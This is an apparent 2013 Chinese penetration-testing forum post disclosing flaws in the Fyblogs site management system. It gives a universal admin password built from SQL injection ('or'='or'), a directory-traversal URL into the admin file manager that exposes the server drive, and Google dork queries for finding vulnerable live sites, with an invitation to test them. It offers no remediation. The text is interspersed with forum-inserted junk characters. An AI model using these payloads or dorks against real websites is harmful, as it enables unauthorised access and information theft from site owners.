中国网络渗透测试联盟

标题: Fyblogs网站管理系统漏洞 [打印本页]
作者: admin    时间: 2013-3-7 13:07
标题: Fyblogs网站管理系统漏洞
漏洞类型: 未授权访问/权限绕过
4 _2 w' n; V. ~% {( C& l2 _
0 e3 [( d8 T4 h  F& {( _简要描述:2 R. F- E4 ?4 P/ N2 r! M8 b, T

0 Z2 E8 c" E3 d# c3 l; j! gFyblogs网站管理系统,,后台存在万能密码,后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!- t3 i# Q* E; f# n. u0 p
, t* s! S( m3 }* Y. g
详细说明:
( t; N* G! G, U1 y% U( @, L6 k+ A
, X( t; g- G' S" \+ I7 c, S后台万能密码 'or'='or'
( p7 o& J6 ]. ?! b  Z/ h2 r后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!8 F7 m4 q! z' k6 N7 _. s: {* W
admin/uploadfile.asp?currentFolder=/upfiles/../
- ~- U  K' G  o- o- b# A( f# X; E4 x1 l5 f7 d7 O
漏洞证明:/ r; j. S  ]" G
3 M- x: B" n( }# {; C
谷歌:inurl:type.asp?id=1 新闻中心& z6 o3 ^" E9 E; D8 U5 W! P' P. `
或者 :inurl:download_ok.asp?2 G' x/ o0 c3 G- H  I

' ?7 B& b8 ?, \+ z, j1 v可以测试6 f. R; K; M5 p/ D( x2 p" W

1 q: A" h; j, W2 [& k  `
- [& E6 [: r' K



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2